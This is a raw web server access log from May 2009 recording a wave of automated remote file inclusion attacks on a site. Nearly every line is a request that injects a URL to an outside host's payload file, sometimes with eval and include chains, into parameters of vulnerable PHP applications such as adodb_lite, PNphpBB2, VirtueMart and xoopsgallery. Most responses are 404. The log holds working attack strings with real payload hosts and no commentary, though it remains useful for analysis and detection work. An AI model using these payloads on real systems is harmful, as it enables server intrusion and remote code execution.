62.72.64.125 - - [16/May/2009:03:38:50 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.72.64.125 - - [16/May/2009:03:38:50 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
124.0.54.98 - - [16/May/2009:03:38:51 -0400] "GET /logs/access_log.Q108111700%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.72.64.125 - - [16/May/2009:03:38:56 -0400] "GET /logs/access_log.Q108090200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.72.64.125 - - [16/May/2009:03:38:56 -0400] "GET /logs/access_log.Q109051200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.94.155.59 - - [16/May/2009:03:39:01 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.94.155.59 - - [16/May/2009:03:39:07 -0400] "GET /logs/access_log.Q108122500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:03:39:29 -0400] "GET /logs/access_log.Q108122100//BaseAdmin.class.php?_CONF[path]=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.0.54.98 - - [16/May/2009:03:40:00 -0400] "GET /logs/access_log.Q108082000%20%20//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:03:40:02 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.84.130.178 - - [16/May/2009:03:40:26 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
88.84.130.178 - - [16/May/2009:03:40:26 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
72.52.255.82 - - [16/May/2009:03:40:44 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:03:40:45 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
217.18.76.16 - - [16/May/2009:03:41:38 -0400] "GET /logs/access_log.Q108112900//classes/adodbt/sql.php?classes_dir=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
121.173.130.41 - - [16/May/2009:03:41:47 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:03:41:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.173.130.41 - - [16/May/2009:03:41:51 -0400] "GET /logs/access_log.Q108122500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:42:10 -0400] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.86.93 - - [16/May/2009:03:42:10 -0400] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:03:42:22 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:03:42:22 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
62.72.64.125 - - [16/May/2009:03:42:26 -0400] "GET /logs/access_log.Q108112200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
88.84.130.178 - - [16/May/2009:03:42:30 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
88.84.130.178 - - [16/May/2009:03:42:30 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
77.221.130.2 - - [16/May/2009:03:42:34 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:03:42:34 -0400] "GET /logs/?sourcedir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 200 1552 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:03:42:34 -0400] "GET /?sourcedir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
62.72.64.125 - - [16/May/2009:03:42:36 -0400] "GET /logs/access_log.Q109051200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:03:42:36 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:03:42:36 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.130.2 - - [16/May/2009:03:42:38 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:03:44:00 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:03:44:00 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:44:01 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:44:01 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:44:01 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:03:44:06 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:03:44:06 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
85.214.86.93 - - [16/May/2009:03:44:22 -0400] "GET /logs/access_log.Q108122100//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
81.201.105.162 - - [16/May/2009:03:44:23 -0400] "GET /logs/access_log.Q108100900%20//include/print_category.php?setup[use_category]=1&dir=http://treffuns.de//img/icons/tabs/id2.txt??%0D?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
72.52.230.168 - - [16/May/2009:03:44:33 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:44:59 -0400] "GET /logs/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:44:59 -0400] "GET /logs/access_log.Q108061300/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:44:59 -0400] "GET /index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:45:04 -0400] "GET /logs/access_log.Q108070500/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:03:45:32 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [16/May/2009:03:45:32 -0400] "GET /logs/access_log.Q107072100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.255.82 - - [16/May/2009:03:45:38 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:03:45:38 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
62.44.79.35 - - [16/May/2009:03:45:43 -0400] "GET /logs/access_log.Q108082000//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:45:49 -0400] "GET /logs/access_log.Q108052400//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:45:50 -0400] "GET /logs/access_log.Q108082000//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.44.79.35 - - [16/May/2009:03:45:50 -0400] "GET /logs/access_log.Q108052400//?path%5Bdocroot%5D=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:46:06 -0400] "GET /index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:46:06 -0400] "GET /logs/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:46:12 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:46:12 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:03:46:12 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:03:46:16 -0400] "GET //imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:03:46:16 -0400] "GET /logs//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
171.64.75.45 - - [16/May/2009:03:46:16 -0400] "GET /logs/access_log.Q108081600%20%20//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:03:46:30 -0400] "GET /port.php?content=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
217.147.29.190 - - [16/May/2009:03:46:30 -0400] "GET /logs/port.php?content=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
110.45.144.33 - - [16/May/2009:03:46:31 -0400] "GET /logs//include/write.php?dir=http://www.fabricnara.com/pma/libraries/id.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
110.45.144.33 - - [16/May/2009:03:46:31 -0400] "GET //include/write.php?dir=http://www.fabricnara.com/pma/libraries/id.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:03:46:35 -0400] "GET /logs/access_log.Q109012800//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:03:46:35 -0400] "GET //citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:03:46:36 -0400] "GET /logs//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.803"
209.59.12.99 - - [16/May/2009:03:46:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.135.14 - - [16/May/2009:03:46:54 -0400] "GET /logs/access_log.Q109012800//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:03:46:54 -0400] "GET //citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:03:46:54 -0400] "GET /logs//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
72.249.65.226 - - [16/May/2009:03:46:56 -0400] "GET /logs/access_log.Q108070500%20%20/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.249.65.226 - - [16/May/2009:03:46:56 -0400] "GET /logs/access_log.Q108061300%20%20/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:03:47:05 -0400] "GET /logs/access_log.Q109012800//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:03:47:06 -0400] "GET //citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:03:47:06 -0400] "GET /logs//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.803"
193.221.119.126 - - [16/May/2009:03:47:11 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.130.178 - - [16/May/2009:03:47:49 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
88.84.130.178 - - [16/May/2009:03:47:49 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
171.64.75.45 - - [16/May/2009:03:47:49 -0400] "GET /logs/access_log.Q109021900%20%20//imgcaptcha.php?mosConfig_absolute_path=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:48:03 -0400] "GET /logs/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:48:03 -0400] "GET /logs/access_log.Q108061300/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:48:03 -0400] "GET /index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:48:07 -0400] "GET /logs/access_log.Q108070500/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:03:48:24 -0400] "GET /logs/access_log.Q108112200//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
72.52.230.168 - - [16/May/2009:03:48:24 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:48:26 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:48:26 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:03:48:26 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:03:48:32 -0400] "GET /logs/access_log.Q108122500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:03:48:53 -0400] "GET /logs/access_log.Q108120600//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
200.32.100.130 - - [16/May/2009:03:49:05 -0400] "GET //include/print_category.php?setup[use_category]=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:03:49:05 -0400] "GET /logs//include/print_category.php?setup[use_category]=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:03:49:05 -0400] "GET /logs/access_log.Q108112200%20%20//include/print_category.php?setup[use_category]=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:03:49:16 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:03:49:16 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
87.106.135.14 - - [16/May/2009:03:49:32 -0400] "GET /logs/access_log.Q108112200//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:03:49:37 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:03:49:38 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.2 - - [16/May/2009:03:49:40 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:03:49:40 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.221.130.2 - - [16/May/2009:03:49:40 -0400] "GET /logs/access_log.Q108110900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:03:49:40 -0400] "GET /logs/access_log.Q108112200//citywriter/head.php?path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
58.227.193.198 - - [16/May/2009:03:49:44 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.146.135 - - [16/May/2009:03:49:44 -0400] "GET //include/write.php?dir=http://www.fabricnara.com/pma/libraries/id.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:49:44 -0400] "GET /logs/index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
110.45.146.135 - - [16/May/2009:03:49:44 -0400] "GET /logs//include/write.php?dir=http://www.fabricnara.com/pma/libraries/id.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:03:49:44 -0400] "GET /index1.php?x=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:03:49:47 -0400] "GET /logs/access_log.Q108111500%20%20//include/print_category.php?setup[use_category]=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.173.130.41 - - [16/May/2009:03:49:48 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
